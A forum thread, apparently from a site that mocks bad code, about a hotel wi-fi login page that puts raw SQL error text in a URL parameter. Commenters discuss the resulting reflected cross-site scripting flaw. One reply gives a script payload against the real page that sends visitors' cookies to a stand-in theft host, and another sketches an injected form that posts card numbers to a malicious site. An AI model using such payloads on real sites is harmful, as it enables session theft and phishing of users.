SQL "Injection" WTF



  • I just checked into a Holiday Inn in Los Angeles, and connected to their free wi-fi network. Of course, it loads an authentication page (We were given a logon and password). Maybe it's because I use Opera and not IE, or just maybe they had a database hiccup, but this is the error page I received (super long URL follows):



    http://ethoserver.ezone.net/message.php?mess=An error occured durring processing. Please call support.<BR>Lost connection to MySQL server during query<BR>SQL: select count(*) from LoginsActive where MacAddress='00:90:96:AC:8C:D8' and MacAddress!=''%20and%20Iface='br0'%20and%20PropertyID='16'%20%3CBR%3E%3CBR%3EIP:sql.ethostream.com%3CBR%3EDBU:remote%3CBR%3EDB:



    Plenty of WTFs to enjoy there. Too bad they didn't include the login ID and password.



    -Hank



  • I got a 404



  •  Granted, that is a horrible way to compose a message and they should really be logging this error internally and rather present you with a generic message so when you call support they can look in their log file. But they're not really giving away any information you wouldn't already know or could guess.

    And you can't do anything with the MySQL server name or table name unless they also misconfigured the server to allow remote access over IP.

     



  • @Dalden said:

    Granted, that is a horrible way to compose a message and they should really be logging this error internally and rather present you with a generic message so when you call support they can look in their log file. But they're not really giving away any information you wouldn't already know or could guess.

    And you can't do anything with the MySQL server name or table name unless they also misconfigured the server to allow remote access over IP.

    Guess you've never heard of XSS then. 



  •  @morbiuswilters said:

    Guess you've never heard of XSS then. 

     I have, if you mean cross site scripting? Do you propose tricking someone with local access to the server into running malicious code with the local user's privileges?



  • @Dalden said:

    I have, if you mean cross site scripting? Do you propose tricking someone with local access to the server into running malicious code with the local user's privileges?

    I mean giving a user a URL formed so that code is injected into the error page.  I'm not sure if that's what you are saying, but it's certainly a security hole.



  • The requested URL /message.php was not found on this server.



  • @morbiuswilters said:

    @Dalden said:

    I have, if you mean cross site scripting? Do you propose tricking someone with local access to the server into running malicious code with the local user's privileges?

    I mean giving a user a URL formed so that code is injected into the error page.  I'm not sure if that's what you are saying, but it's certainly a security hole.

    I've seen some apps using this "method" for error messages. At least one financial institution had something like this:

    http://wtfbank.com/SomeCrappyApp/error_message.jsp?error=The%20desktop%20environment%20could%20not%20be%20loaded.%20Please%20contact%20your%20administrator.

    Some time ago we took a snapshot of that error "page", with another message akin to User%20too%20stupid%20to%20use%20computer, and sometimes used said URL in testing environments. We were trying to show how bad an idea it was to display error messages like this, but no one cared.



  • Apparently you need to be connected to their network to see the error:



    Here's a screen print:




    [Screenshot: http://forums.wheresgeorge.com/attachment.php?attachmentid=2894&stc=1&d=1215617217]





  • @morbiuswilters said:

    I mean giving a user a URL formed so that code is injected into the error page.  I'm not sure if that's what you are saying, but it's certainly a security hole.

    A very minor one in this case though, I think. From what I can see, the site uses neither cookies nor a login on that host. In fact, the message.php thing seems to have been the only dynamic page there.

    So until we get cross domain XMLHTTP, I don't think you could do more harm than the mandatory 'while(1)alert("lulz, I'm in ur browser getting on ur nerves");' message loop.

    [EDIT]

    Okay, I'm connecting from outside, so maybe I don't see some things there.



  • @danixdefcon5 said:

    Try this: http://ethoserver.ezone.net/message.php?mess=EPIC%20FAIL!!!!!

    That works!! (for me, currently on their network)



  • @PSWorx said:

    So until we get cross domain XMLHTTP, I don't think you could do more harm than the mandatory 'while(1)alert("lulz, I'm in ur browser getting on ur nerves");' message loop.

    Those already exist; they're called iframes. :) The bigger problem here though is probably from a social engineering standpoint, where one may be able to inject a form like <form method="post" action="http://malicioussite.com/stealstuff"><p>Enter your username and password/credit card information/mother's maiden name to continue</p><input type="text" name="ccnum" /> ...</form> etc etc.



  • Unless I'm mistaken, aren't they simply passing the error message to display as a URL parameter?  Printing the invalid query to the user isn't the smartest thing in the world, but I'm not sure this page is vulnerable to SQL injection...  And yes, this is a horrible way of passing error messages.  I think I did something like it once, before I learned about session variables and cookies.



  • @PSWorx said:

    So until we get cross domain XMLHTTP, I don't think you could do more harm than the mandatory 'while(1)alert("lulz, I'm in ur browser getting on ur nerves");' message loop.

     

    What about

    http://ethoserver.ezone.net/message.php?mess=%3Cscript%3Ewindow.location%20%3D%20%22http%3A//cookietheft.net/steal%3F%22%20%2B%20document.cookie%3C/script%3E



  • @bighusker said:

    I think i did something like it once, before I learned about session variables and cookies.

    Error messages in session variables and cookies?  WTF? 



  • @morbiuswilters said:

    Error messages in session variables and cookies?  WTF? 

    In some convoluted Ajax apps, you might see errors (as well as just about everything else) funneled through the session state.  Not that this is common, and most of the time there's a better way, but it's not totally inconceivable.

    Cookies I can't even guess... 



  • I wasn't referring to passing error messages through session variables and cookies.  I was simply referring to passing data around between pages.  5-6 years ago, I would often just keep passing crap through a query_string if it had to cycle through multiple different pages...which meant any time you wanted an extra piece of data to get passed, you had to modify how the query string is built on each page.  And yeah...I've never used cookies for anything like that.  I think I was a bit hurried when I typed it.

     

    I can't think of any practical reason for passing specific error messages through a URL parameter....that's a whole other problem. 



  • @bighusker said:

    I can't think of any practical reason for passing specific error messages through a URL parameter....that's a whole other problem. 

    I have something to confess, I actually thought about doing that once.  I was thinking about how to optimize a site that was already mostly static pages and I thought about having a generic, static "message" page that had the actual message written out by Javascript.  Of course, it would have been properly escaped, but that's still a bit of a WTF.



  • @bighusker said:

    but I'm not sure this page is vulnerable to SQL injection...



    That's why I put "injection" in quotes. It's injecting SQL into the error message page, not the database.

